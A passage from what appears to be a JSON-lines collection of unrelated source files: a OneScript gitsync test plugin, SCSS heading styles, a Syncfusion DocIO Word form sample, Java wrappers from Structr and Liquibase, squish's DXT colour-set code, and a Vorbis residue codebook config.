КаталогРабочейКопии, КаталогВыгрузки, ПутьКХранилищу, НомерВерсии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПередОчисткойКаталогаРабочейКопии> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// <Описание процедуры>\n//\n// Параметры:\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// СоответствиеИменФайловДляПропуска - <Тип.Вид> - <описание параметра>\n// СтандартнаяОбработка - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПриОчисткеКаталогаРабочейКопии(КаталогРабочейКопии, СоответствиеИменФайловДляПропуска, СтандартнаяОбработка) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриОчисткеКаталогаРабочейКопии> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// <Описание процедуры>\n//\n// Параметры:\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// СоответствиеИменФайловДляПропуска - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПослеОчисткиКаталогаРабочейКопии(КаталогРабочейКопии, СоответствиеИменФайловДляПропуска) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеОчисткиКаталогаРабочейКопии> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_перемещение_в_каталог_рабочей_копии\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// КаталогВыгрузки - <Тип.Вид> - <описание параметра>\n// ПутьКХранилищу - <Тип.Вид> - <описание параметра>\n// НомерВерсии - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПередПеремещениемВКаталогРабочейКопии(Конфигуратор, КаталогРабочейКопии, КаталогВыгрузки, ПутьКХранилищу, НомерВерсии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПередПеремещениемВКаталогРабочейКопии> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// <Описание процедуры>\n//\n// Параметры:\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// КаталогВыгрузки - <Тип.Вид> - <описание параметра>\n// СтандартнаяОбработка - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПриПеремещенииВКаталогРабочейКопии(КаталогРабочейКопии, КаталогВыгрузки, СтандартнаяОбработка) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриПеремещенииВКаталогРабочейКопии> для плагина <%1>\", Имя());\n\t\nКонецПроцедуры\n\n// <Описание процедуры>\n//\n// Параметры:\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// КаталогВыгрузки - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПослеПеремещенияВКаталогРабочейКопии(КаталогРабочейКопии, КаталогВыгрузки) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеПеремещенияВКаталогРабочейКопии> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Интерфейс_плагина\n\n// <Описание функции>\n//\n// Возвращаемое значение:\n// <Тип.Вид> - <описание возвращаемого значения>\n//\nФункция Версия() Экспорт\n\tВозврат \"0.0.1\";\nКонецФункции\n\n// <Описание функции>\n//\n// Возвращаемое значение:\n// <Тип.Вид> - <описание возвращаемого значения>\n//\nФункция Описание() Экспорт\n\tВозврат \"Тестовый плагин\";\nКонецФункции\n\n// <Описание функции>\n//\n// Возвращаемое значение:\n// <Тип.Вид> - <описание возвращаемого значения>\n//\nФункция Справка() Экспорт\n\tВозврат \"Справка плагина\";\nКонецФункции\n\n// <Описание функции>\n//\n// Возвращаемое значение:\n// <Тип.Вид> - <описание возвращаемого значения>\n//\nФункция Имя() Экспорт\n\tВозврат \"test_plugin\";\nКонецФункции\n\n// <Описание функции>\n//\n// Возвращаемое значение:\n// <Тип.Вид> - <описание возвращаемого значения>\n//\nФункция ИмяЛога() Экспорт\n\tВозврат 
\"oscript.lib.gitsync.test_plugin\";\nКонецФункции\n\n// <Описание функции>\n//\n// Возвращаемое значение:\n// <Тип.Вид> - <описание возвращаемого значения>\n//\nФункция Приоритет() Экспорт\n\tВозврат 1;\nКонецФункции\n\n#КонецОбласти\n\nЛог = Логирование.ПолучитьЛог(ИмяЛога());\n\n"} {"text": ".h1,\n.h2,\n.h3,\n.h4,\n.h5,\n.h6,\nh1,\nh2,\nh3,\nh4,\nh5,\nh6 {\n margin-bottom: .5rem;\n font-family: inherit;\n font-weight: 500;\n line-height: 1.2;\n color: inherit;\n}\n\nh1,\n.h1 {\n margin: 0;\n padding: 15px 0 0;\n font-weight: 700;\n font-size: 2.5rem;\n\n @include mq('handheld-and-up') {\n font-size: 3rem;\n }\n\n @include mq('print') {\n font-size: 18pt;\n padding: 0 0 5px;\n }\n}\n\nh2,\n.h2 {\n font-size: 2rem;\n}\n\nh3,\n.h3 {\n font-size: 1.2rem;\n font-weight: 700;\n\n @include mq('handheld-and-up') {\n font-size: 1.3rem;\n }\n}\n\nh4,\n.h4 {\n font-size: 1.2rem;\n font-weight: 700;\n\n @include mq('handheld-and-up') {\n font-size: 1.3rem;\n }\n}\n"} {"text": "#region Copyright Syncfusion Inc. 2001-2020.\n// Copyright Syncfusion Inc. 2001-2020. All rights reserved.\n// Use of this code is subject to the terms of our license.\n// A copy of the current license can be obtained at any time by e-mailing\n// licensing@syncfusion.com. Any infringement will be prosecuted under\n// applicable laws. \n#endregion\nusing System;\nusing System.IO;\nusing System.Reflection;\nusing SampleBrowser.Core;\nusing Syncfusion.DocIO;\nusing Syncfusion.DocIO.DLS;\nusing Xamarin.Forms;\n\nnamespace SampleBrowser.DocIO\n{\n ///

\n /// A sample view that can be used on FormFillingAndProtection.\n /// \n public partial class FormFillingAndProtection : SampleView\n {\n /// \n /// Constructor for FormFillingAndProtection.\n /// \n public FormFillingAndProtection()\n {\n InitializeComponent();\n\n if (Device.Idiom != TargetIdiom.Phone && Device.RuntimePlatform == Device.UWP)\n {\n \n this.Content_1.HorizontalOptions = LayoutOptions.Start;\n this.btnGenerate.HorizontalOptions = LayoutOptions.Start;\n\n \n this.Content_1.VerticalOptions = LayoutOptions.Center;\n this.btnGenerate.VerticalOptions = LayoutOptions.Center;\n\t\t\t\tthis.btnGenerate.BackgroundColor = Xamarin.Forms.Color.Gray;\n }\n else if (Device.Idiom == TargetIdiom.Phone && Device.RuntimePlatform == Device.UWP)\n {\n //if (!SampleBrowser.DocIO.App.isUWP)\n //{\n // this.Content_1.FontSize = 18.5;\n //}\n //else\n //{\n this.Content_1.FontSize = 13.5;\n // }\n \n this.Content_1.VerticalOptions = LayoutOptions.Center;\n this.btnGenerate.VerticalOptions = LayoutOptions.Center;\n }\n }\n /// \n /// Button click event for FormFillingAndProtection.\n /// \n /// Sender\n /// Event args\n private void OnButtonClicked(object sender, EventArgs e)\n {\n#if COMMONSB\n string rootPath = \"SampleBrowser.Samples.DocIO.Samples.Templates.\";\n#else\n string rootPath = \"SampleBrowser.DocIO.Samples.Templates.\";\n#endif\n // Load Template document stream.\n Stream inputStream = typeof(FormFillingAndProtection).GetTypeInfo().Assembly.GetManifestResourceStream(rootPath + \"ContentControlTemplate.docx\");\n\n // Creates an empty Word document instance.\n WordDocument document = new WordDocument();\n // Opens template document.\n document.Open(inputStream, FormatType.Docx);\n\n IWTextRange textRange;\n //Gets table from the template document.\n IWTable table = document.LastSection.Tables[0];\n WTableRow row = table.Rows[1];\n\n #region Inserting content controls\n\n #region Calendar content control\n IWParagraph cellPara = row.Cells[0].Paragraphs[0];\n //Accesses the date picker content control.\n IInlineContentControl inlineControl = (cellPara.ChildEntities[2] as IInlineContentControl);\n textRange = inlineControl.ParagraphItems[0] as WTextRange;\n //Sets today's date to display.\n textRange.Text = DateTime.Now.ToString(\"d\");\n textRange.CharacterFormat.FontSize = 14;\n //Protects the content control.\n inlineControl.ContentControlProperties.LockContents = true;\n #endregion\n\n #region Plain text content controls\n table = document.LastSection.Tables[1];\n row = table.Rows[0];\n cellPara = row.Cells[0].LastParagraph;\n //Accesses the plain text content control.\n inlineControl = (cellPara.ChildEntities[1] as IInlineContentControl);\n //Protects the content control.\n inlineControl.ContentControlProperties.LockContents = true;\n textRange = inlineControl.ParagraphItems[0] as WTextRange;\n //Sets text in plain text content control.\n textRange.Text = \"Northwind Analytics\";\n textRange.CharacterFormat.FontSize = 14;\n\n cellPara = row.Cells[1].LastParagraph;\n //Accesses the plain text content control.\n inlineControl = (cellPara.ChildEntities[1] as IInlineContentControl);\n //Protects the content control.\n inlineControl.ContentControlProperties.LockContents = true;\n textRange = inlineControl.ParagraphItems[0] as WTextRange;\n //Sets text in plain text content control.\n textRange.Text = \"Northwind\";\n textRange.CharacterFormat.FontSize = 14;\n\n row = table.Rows[1];\n cellPara = row.Cells[0].LastParagraph;\n //Accesses the plain text content control.\n inlineControl = 
(cellPara.ChildEntities[1] as IInlineContentControl);\n //Protects the content control.\n inlineControl.ContentControlProperties.LockContents = true;\n //Sets text in plain text content control.\n textRange = inlineControl.ParagraphItems[0] as WTextRange;\n textRange.Text = \"10\";\n textRange.CharacterFormat.FontSize = 14;\n\n\n cellPara = row.Cells[1].LastParagraph;\n //Accesses the plain text content control.\n inlineControl = (cellPara.ChildEntities[1] as IInlineContentControl);\n //Protects the content control.\n inlineControl.ContentControlProperties.LockContents = true;\n //Sets text in plain text content control.\n textRange = inlineControl.ParagraphItems[0] as WTextRange;\n textRange.Text = \"Nancy Davolio\";\n textRange.CharacterFormat.FontSize = 14;\n #endregion\n\n #region CheckBox Content control\n row = table.Rows[2];\n cellPara = row.Cells[0].LastParagraph;\n //Inserts checkbox content control.\n inlineControl = cellPara.AppendInlineContentControl(ContentControlType.CheckBox);\n inlineControl.ContentControlProperties.LockContents = true;\n //Sets checkbox as checked state.\n inlineControl.ContentControlProperties.IsChecked = true;\n textRange = cellPara.AppendText(\"C#, \");\n textRange.CharacterFormat.FontSize = 14;\n\n //Inserts checkbox content control.\n inlineControl = cellPara.AppendInlineContentControl(ContentControlType.CheckBox);\n inlineControl.ContentControlProperties.LockContents = true;\n //Sets checkbox as checked state.\n inlineControl.ContentControlProperties.IsChecked = true;\n textRange = cellPara.AppendText(\"VB\");\n textRange.CharacterFormat.FontSize = 14;\n #endregion\n\n\n #region Drop down list content control\n cellPara = row.Cells[1].LastParagraph;\n //Accesses the dropdown list content control.\n inlineControl = (cellPara.ChildEntities[1] as IInlineContentControl);\n inlineControl.ContentControlProperties.LockContents = true;\n //Sets default option to display.\n textRange = inlineControl.ParagraphItems[0] as WTextRange;\n textRange.Text = \"ASP.NET\";\n textRange.CharacterFormat.FontSize = 14;\n inlineControl.ParagraphItems.Add(textRange);\n\n //Adds items to the dropdown list.\n ContentControlListItem item;\n item = new ContentControlListItem();\n item.DisplayText = \"ASP.NET MVC\";\n item.Value = \"2\";\n inlineControl.ContentControlProperties.ContentControlListItems.Add(item);\n\n item = new ContentControlListItem();\n item.DisplayText = \"Windows Forms\";\n item.Value = \"3\";\n inlineControl.ContentControlProperties.ContentControlListItems.Add(item);\n\n item = new ContentControlListItem();\n item.DisplayText = \"WPF\";\n item.Value = \"4\";\n inlineControl.ContentControlProperties.ContentControlListItems.Add(item);\n\n item = new ContentControlListItem();\n item.DisplayText = \"Xamarin\";\n item.Value = \"5\";\n inlineControl.ContentControlProperties.ContentControlListItems.Add(item);\n #endregion\n\n #region Calendar content control\n row = table.Rows[3];\n cellPara = row.Cells[0].LastParagraph;\n //Accesses the date picker content control.\n inlineControl = (cellPara.ChildEntities[1] as IInlineContentControl);\n inlineControl.ContentControlProperties.LockContents = true;\n //Sets default date to display.\n textRange = inlineControl.ParagraphItems[0] as WTextRange;\n textRange.Text = DateTime.Now.AddDays(-5).ToString(\"d\");\n textRange.CharacterFormat.FontSize = 14;\n\n cellPara = row.Cells[1].LastParagraph;\n //Inserts date picker content control.\n inlineControl = (cellPara.ChildEntities[1] as IInlineContentControl);\n 
inlineControl.ContentControlProperties.LockContents = true;\n //Sets default date to display.\n textRange = inlineControl.ParagraphItems[0] as WTextRange;\n textRange.Text = DateTime.Now.AddDays(10).ToString(\"d\");\n textRange.CharacterFormat.FontSize = 14;\n #endregion\n\n #endregion\n #region Block content control\n //Accesses the block content control.\n BlockContentControl blockContentControl = ((document.ChildEntities[0] as WSection).Body.ChildEntities[2] as BlockContentControl);\n //Protects the block content control\n blockContentControl.ContentControlProperties.LockContents = true;\n #endregion\n\n MemoryStream stream = new MemoryStream();\n document.Save(stream, FormatType.Docx);\n document.Close();\n\n if (Device.RuntimePlatform == Device.UWP)\n DependencyService.Get()\n .Save(\"FormFillingAndProtection.docx\", \"application/msword\", stream);\n else\n DependencyService.Get().Save(\"FormFillingAndProtection.docx\", \"application/msword\", stream);\n }\n }\n}\n"} {"text": "/*\n * Copyright (C) 2010-2020 Structr GmbH\n *\n * This file is part of Structr .\n *\n * Structr is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as\n * published by the Free Software Foundation, either version 3 of the\n * License, or (at your option) any later version.\n *\n * Structr is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with Structr. If not, see .\n */\npackage org.structr.memgraph;\n\nimport java.util.Iterator;\nimport java.util.LinkedList;\nimport java.util.List;\nimport org.neo4j.driver.v1.types.Path.Segment;\nimport org.neo4j.driver.v1.types.Relationship;\nimport org.structr.api.NotFoundException;\nimport org.structr.api.graph.Path;\nimport org.structr.api.graph.PropertyContainer;\n\n\n/**\n *\n */\nclass PathWrapper implements Path {\n\n\tprivate org.neo4j.driver.v1.types.Path path = null;\n\tprivate MemgraphDatabaseService db = null;\n\n\tpublic PathWrapper(final MemgraphDatabaseService db, final org.neo4j.driver.v1.types.Path path) {\n\n\t\tthis.path = path;\n\t\tthis.db = db;\n\t}\n\n\t@Override\n\tpublic Iterator iterator() {\n\n\t\tif (path.length() > 0) {\n\n\t\t\treturn new SegmentIterator(path);\n\t\t}\n\n\t\tfinal List list = new LinkedList<>();\n\t\tlist.add(NodeWrapper.newInstance(db, path.start()));\n\n\t\treturn list.iterator();\n\t}\n\n\t// ----- nested classes -----\n\tprivate class SegmentIterator implements Iterator {\n\n\t\tprivate Iterator it = null;\n\t\tprivate Segment current = null;\n\t\tprivate int state = 0;\n\n\t\tpublic SegmentIterator(final org.neo4j.driver.v1.types.Path path) {\n\t\t\tthis.it = path.iterator();\n\t\t}\n\n\t\t@Override\n\t\tpublic boolean hasNext() {\n\t\t\treturn state < 3;\n\t\t}\n\n\t\t@Override\n\t\tpublic PropertyContainer next() {\n\n\t\t\tif (current == null) {\n\n\t\t\t\tcurrent = it.next();\n\t\t\t}\n\n\t\t\tswitch (state) {\n\n\t\t\t\tcase 0:\n\t\t\t\t\tstate = 1;\n\t\t\t\t\treturn NodeWrapper.newInstance(db, current.start());\n\n\t\t\t\tcase 1:\n\t\t\t\t\tfinal Relationship rel = current.relationship();\n\t\t\t\t\tif (it.hasNext()) {\n\n\t\t\t\t\t\tstate = 0;\n\t\t\t\t\t\tcurrent = null;\n\n\t\t\t\t\t} else {\n\n\t\t\t\t\t\tstate = 2;\n\t\t\t\t\t}\n\t\t\t\t\treturn RelationshipWrapper.newInstance(db, 
rel);\n\n\t\t\t\tcase 2:\n\t\t\t\t\tstate = 3;\n\t\t\t\t\treturn NodeWrapper.newInstance(db, current.end());\n\t\t\t}\n\n\t\t\tthrow new NotFoundException(\"No such element.\");\n\t\t}\n\n\t\t@Override\n\t\tpublic void remove() {\n\t\t\tthrow new UnsupportedOperationException(\"Removal not supported.\");\n\t\t}\n\t}\n\n}\n"} {"text": "package liquibase.ext.hibernate.database.connection;\n\nimport liquibase.resource.ResourceAccessor;\n\nimport java.io.IOException;\nimport java.io.StringReader;\nimport java.net.URLDecoder;\nimport java.sql.*;\nimport java.util.Map;\nimport java.util.Properties;\nimport java.util.concurrent.Executor;\n\n/**\n * Implements java.sql.Connection in order to pretend a hibernate configuration is a database in order to fit into the Liquibase framework.\n * Beyond standard Connection methods, this class exposes {@link #getPrefix()}, {@link #getPath()} and {@link #getProperties()} to access the setting passed in the JDBC URL.\n */\npublic class HibernateConnection implements Connection {\n private String prefix;\n private String url;\n\n private String path;\n private ResourceAccessor resourceAccessor;\n private Properties properties;\n\n public HibernateConnection(String url, ResourceAccessor resourceAccessor) {\n this.url = url;\n\n this.prefix = url.replaceFirst(\":[^:]+$\", \"\");\n\n // Trim the prefix off the URL for the path\n path = url.substring(prefix.length() + 1);\n this.resourceAccessor = resourceAccessor;\n\n // Check if there is a parameter/query string value.\n properties = new Properties();\n\n int queryIndex = path.indexOf('?');\n if (queryIndex >= 0) {\n // Convert the query string into properties\n properties.putAll(readProperties(path.substring(queryIndex + 1)));\n\n if (properties.containsKey(\"dialect\") && !properties.containsKey(\"hibernate.dialect\")) {\n properties.put(\"hibernate.dialect\", properties.getProperty(\"dialect\"));\n }\n\n // Remove the query string\n path = path.substring(0, queryIndex);\n }\n }\n\n /**\n * Creates properties to attach to this connection based on the passed query string.\n */\n protected Properties readProperties(String queryString) {\n Properties properties = new Properties();\n queryString = queryString.replaceAll(\"&\", System.getProperty(\"line.separator\"));\n try {\n queryString = URLDecoder.decode(queryString, \"UTF-8\");\n properties.load(new StringReader(queryString));\n } catch (IOException ioe) {\n throw new IllegalStateException(\"Failed to read properties from url\", ioe);\n }\n\n return properties;\n }\n\n /**\n * Returns the entire connection URL\n */\n public String getUrl() {\n return url;\n }\n\n\n /**\n * Returns the 'protocol' of the URL. For example, \"hibernate:classic\" or \"hibernate:ejb3\"\n */\n public String getPrefix() {\n return prefix;\n }\n\n /**\n * The portion of the url between the path and the query string. Normally a filename or a class name.\n */\n public String getPath() {\n return path;\n }\n\n /**\n * The set of properties provided by the URL. Eg:\n *
\n * hibernate:classic:/path/to/hibernate.cfg.xml?foo=bar\n *
\n * This will have a property called 'foo' with a value of 'bar'.\n */\n public Properties getProperties() {\n return properties;\n }\n\n\n ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////\n /// JDBC METHODS\n ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////\n\n public Statement createStatement() throws SQLException {\n return null;\n }\n\n public PreparedStatement prepareStatement(String sql) throws SQLException {\n return null;\n }\n\n public CallableStatement prepareCall(String sql) throws SQLException {\n return null;\n }\n\n public String nativeSQL(String sql) throws SQLException {\n return null;\n }\n\n public void setAutoCommit(boolean autoCommit) throws SQLException {\n\n }\n\n public boolean getAutoCommit() throws SQLException {\n return false;\n }\n\n public void commit() throws SQLException {\n\n }\n\n public void rollback() throws SQLException {\n\n }\n\n public void close() throws SQLException {\n\n }\n\n public boolean isClosed() throws SQLException {\n return false;\n }\n\n public DatabaseMetaData getMetaData() throws SQLException {\n return new HibernateConnectionMetadata(url);\n }\n\n public void setReadOnly(boolean readOnly) throws SQLException {\n\n }\n\n public boolean isReadOnly() throws SQLException {\n return true;\n }\n\n public void setCatalog(String catalog) throws SQLException {\n\n }\n\n public String getCatalog() throws SQLException {\n return \"HIBERNATE\";\n }\n\n public void setTransactionIsolation(int level) throws SQLException {\n\n }\n\n public int getTransactionIsolation() throws SQLException {\n return 0;\n }\n\n public SQLWarning getWarnings() throws SQLException {\n return null;\n }\n\n public void clearWarnings() throws SQLException {\n\n }\n\n public Statement createStatement(int resultSetType, int resultSetConcurrency) throws SQLException {\n return null;\n }\n\n public PreparedStatement prepareStatement(String sql, int resultSetType, int resultSetConcurrency) throws SQLException {\n return null;\n }\n\n public CallableStatement prepareCall(String sql, int resultSetType, int resultSetConcurrency) throws SQLException {\n return null;\n }\n\n public Map> getTypeMap() throws SQLException {\n return null;\n }\n\n public void setTypeMap(Map> map) throws SQLException {\n\n }\n\n public void setHoldability(int holdability) throws SQLException {\n\n }\n\n public int getHoldability() throws SQLException {\n return 0;\n }\n\n public Savepoint setSavepoint() throws SQLException {\n return null;\n }\n\n public Savepoint setSavepoint(String name) throws SQLException {\n return null;\n }\n\n public void rollback(Savepoint savepoint) throws SQLException {\n\n }\n\n public void releaseSavepoint(Savepoint savepoint) throws SQLException {\n\n }\n\n public Statement createStatement(int resultSetType, int resultSetConcurrency, int resultSetHoldability) throws SQLException {\n return null;\n }\n\n public PreparedStatement prepareStatement(String sql, int resultSetType, int resultSetConcurrency, int resultSetHoldability) throws SQLException {\n return null;\n }\n\n public CallableStatement prepareCall(String sql, int resultSetType, int resultSetConcurrency, int resultSetHoldability) throws SQLException {\n return null;\n }\n\n public PreparedStatement prepareStatement(String sql, int autoGeneratedKeys) throws SQLException {\n return null;\n }\n\n public PreparedStatement prepareStatement(String sql, int[] columnIndexes) throws 
SQLException {\n return null;\n }\n\n public PreparedStatement prepareStatement(String sql, String[] columnNames) throws SQLException {\n return null;\n }\n\n public Clob createClob() throws SQLException {\n return null;\n }\n\n public Blob createBlob() throws SQLException {\n return null;\n }\n\n public NClob createNClob() throws SQLException {\n return null;\n }\n\n public SQLXML createSQLXML() throws SQLException {\n return null;\n }\n\n public boolean isValid(int timeout) throws SQLException {\n return false;\n }\n\n public void setClientInfo(String name, String value) throws SQLClientInfoException {\n\n }\n\n public void setClientInfo(Properties properties) throws SQLClientInfoException {\n\n }\n\n public String getClientInfo(String name) throws SQLException {\n return null;\n }\n\n public Properties getClientInfo() throws SQLException {\n return null;\n }\n\n public Array createArrayOf(String typeName, Object[] elements) throws SQLException {\n return null;\n }\n\n public Struct createStruct(String typeName, Object[] attributes) throws SQLException {\n return null;\n }\n\n public T unwrap(Class iface) throws SQLException {\n return null;\n }\n\n public boolean isWrapperFor(Class iface) throws SQLException {\n return false;\n }\n\n //@Override only in java 1.7\n public void abort(Executor arg0) throws SQLException {\n }\n\n //@Override only in java 1.7\n public int getNetworkTimeout() throws SQLException {\n return 0;\n }\n\n //@Override only in java 1.7\n public String getSchema() throws SQLException {\n return \"HIBERNATE\";\n }\n\n //@Override only in java 1.7\n public void setNetworkTimeout(Executor arg0, int arg1) throws SQLException {\n }\n\n //@Override only in java 1.7\n public void setSchema(String arg0) throws SQLException {\n }\n\n public ResourceAccessor getResourceAccessor() {\n return resourceAccessor;\n }\n}\n"} {"text": "/* -----------------------------------------------------------------------------\n\n\tCopyright (c) 2006 Simon Brown si@sjbrown.co.uk\n\n\tPermission is hereby granted, free of charge, to any person obtaining\n\ta copy of this software and associated documentation files (the \n\t\"Software\"), to\tdeal in the Software without restriction, including\n\twithout limitation the rights to use, copy, modify, merge, publish,\n\tdistribute, sublicense, and/or sell copies of the Software, and to \n\tpermit persons to whom the Software is furnished to do so, subject to \n\tthe following conditions:\n\n\tThe above copyright notice and this permission notice shall be included\n\tin all copies or substantial portions of the Software.\n\n\tTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n\tOR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF \n\tMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n\tIN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY \n\tCLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, \n\tTORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE \n\tSOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\t\n -------------------------------------------------------------------------- */\n \n#include \"colourset.h\"\n\nnamespace squish {\n\nColourSet::ColourSet( u8 const* rgba, int mask, int flags )\n : m_count( 0 ), \n\tm_transparent( false )\n{\n\t// check the compression mode for dxt1\n\tbool isDxt1 = ( ( flags & kDxt1 ) != 0 );\n\tbool weightByAlpha = ( ( flags & kWeightColourByAlpha ) != 0 );\n\n\t// create the minimal set\n\tfor( int i = 0; i < 16; 
++i )\n\t{\n\t\t// check this pixel is enabled\n\t\tint bit = 1 << i;\n\t\tif( ( mask & bit ) == 0 )\n\t\t{\n\t\t\tm_remap[i] = -1;\n\t\t\tcontinue;\n\t\t}\n\t\n\t\t// check for transparent pixels when using dxt1\n\t\tif( isDxt1 && rgba[4*i + 3] < 128 )\n\t\t{\n\t\t\tm_remap[i] = -1;\n\t\t\tm_transparent = true;\n\t\t\tcontinue;\n\t\t}\n\n\t\t// loop over previous points for a match\n\t\tfor( int j = 0;; ++j )\n\t\t{\n\t\t\t// allocate a new point\n\t\t\tif( j == i )\n\t\t\t{\n\t\t\t\t// normalise coordinates to [0,1]\n\t\t\t\tfloat x = ( float )rgba[4*i] / 255.0f;\n\t\t\t\tfloat y = ( float )rgba[4*i + 1] / 255.0f;\n\t\t\t\tfloat z = ( float )rgba[4*i + 2] / 255.0f;\n\t\t\t\t\n\t\t\t\t// ensure there is always non-zero weight even for zero alpha\n\t\t\t\tfloat w = ( float )( rgba[4*i + 3] + 1 ) / 256.0f;\n\n\t\t\t\t// add the point\n\t\t\t\tm_points[m_count] = Vec3( x, y, z );\n\t\t\t\tm_weights[m_count] = ( weightByAlpha ? w : 1.0f );\n\t\t\t\tm_remap[i] = m_count;\n\t\t\t\t\n\t\t\t\t// advance\n\t\t\t\t++m_count;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\n\t\t\t// check for a match\n\t\t\tint oldbit = 1 << j;\n\t\t\tbool match = ( ( mask & oldbit ) != 0 )\n\t\t\t\t&& ( rgba[4*i] == rgba[4*j] )\n\t\t\t\t&& ( rgba[4*i + 1] == rgba[4*j + 1] )\n\t\t\t\t&& ( rgba[4*i + 2] == rgba[4*j + 2] )\n\t\t\t\t&& ( rgba[4*j + 3] >= 128 || !isDxt1 );\n\t\t\tif( match )\n\t\t\t{\n\t\t\t\t// get the index of the match\n\t\t\t\tint index = m_remap[j];\n\t\t\t\t\n\t\t\t\t// ensure there is always non-zero weight even for zero alpha\n\t\t\t\tfloat w = ( float )( rgba[4*i + 3] + 1 ) / 256.0f;\n\n\t\t\t\t// map to this point and increase the weight\n\t\t\t\tm_weights[index] += ( weightByAlpha ? w : 1.0f );\n\t\t\t\tm_remap[i] = index;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t}\n\n\t// square root the weights\n\tfor( int i = 0; i < m_count; ++i )\n\t\tm_weights[i] = std::sqrt( m_weights[i] );\n}\n\nvoid ColourSet::RemapIndices( u8 const* source, u8* target ) const\n{\n\tfor( int i = 0; i < 16; ++i )\n\t{\n\t\tint j = m_remap[i];\n\t\tif( j == -1 )\n\t\t\ttarget[i] = 3;\n\t\telse\n\t\t\ttarget[i] = source[j];\n\t}\n}\n\n} // namespace squish\n"} {"text": "\nGO\n\n>_16c0_s noninterleaved\nhaux 16c0_s/resaux_0.vqd _16c0_s_single 0,64,2 10\n\t\n:_p1_0 16c0_s/res_sub0_part1_pass2.vqd, 8, nonseq cull, 0 +- 1\n:_p2_0 16c0_s/res_sub0_part2_pass2.vqd, 4, nonseq cull, 0 +- 1 2\n:_p3_0 16c0_s/res_sub0_part3_pass2.vqd, 4, nonseq cull, 0 +- 1 2\n:_p4_0 16c0_s/res_sub0_part4_pass2.vqd, 2, nonseq cull, 0 +- 1 2 3 4\n:_p5_0 16c0_s/res_sub0_part5_pass2.vqd, 2, nonseq cull, 0 +- 1 2 3 4\n:_p6_0 16c0_s/res_sub0_part6_pass2.vqd, 2, nonseq cull, 0 +- 1 2 3 4 5 6 7 8\n\n\n:_p7_0 16c0_s/res_sub0_part7_pass0.vqd, 4, nonseq cull, 0 +- 11\n:_p7_1 16c0_s/res_sub0_part7_pass1.vqd, 2, nonseq cull, 0 +- 1 2 3 4 5 \n\n:_p8_0 16c0_s/res_sub0_part8_pass0.vqd, 2, nonseq cull, 0 +- 5 10 15 20 25 30\n:_p8_1 16c0_s/res_sub0_part8_pass1.vqd, 2, nonseq cull, 0 +- 1 2 \n\n:_p9_0 16c0_s/res_sub0_part9_pass0.vqd, 4, nonseq, 0 +- 315\n:_p9_1 16c0_s/res_sub0_part9_pass1.vqd, 2, nonseq, 0 +- 21 42 63 84 105 126 147\n:_p9_2 16c0_s/res_sub0_part9_pass2.vqd, 2, nonseq, 0 +- 1 2 3 4 5 6 7 8 9 10\n\n>_16c1s_s noninterleaved\nhaux 16c1_s/resaux_0.vqd _16c1_s_short 0,64,2 10\n\n>_16c1_s noninterleaved\nhaux 16c1_s/resaux_1.vqd _16c1_s_long 0,64,2 10\n\t\n:_p1_0 16c1_s/res_sub0_part1_pass2.vqd, 8, nonseq cull, 0 +- 1\n:_p2_0 16c1_s/res_sub0_part2_pass2.vqd, 4, nonseq cull, 0 +- 1 2\n:_p3_0 16c1_s/res_sub0_part3_pass2.vqd, 4, nonseq cull, 0 +- 1 2\n:_p4_0 
